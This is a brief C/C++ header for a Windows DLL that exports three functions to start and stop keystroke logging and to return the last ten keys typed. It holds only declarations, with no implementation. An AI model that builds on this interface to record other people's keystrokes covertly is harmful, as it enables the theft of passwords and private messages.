#pragma once

#ifdef LIBDINAMIC_EXPORTS
#define LIBDINAMIC_API __declspec(dllexport)
#else
#define LIBDINAMIC_API __declspec(dllimport)
#endif

extern "C" {
    LIBDINAMIC_API void StartKeyLogging();
    LIBDINAMIC_API void StopKeyLogging();
    LIBDINAMIC_API const char* GetLastTenKeys();
}
